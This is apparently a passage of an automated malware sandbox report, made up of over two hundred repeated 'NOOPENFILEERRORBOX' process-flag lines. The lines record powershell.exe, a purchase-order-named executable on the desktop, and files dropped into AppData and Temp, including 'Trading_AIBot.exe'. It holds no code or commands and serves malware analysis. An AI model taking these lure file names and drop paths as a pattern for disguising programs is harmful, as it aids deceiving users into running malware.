Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
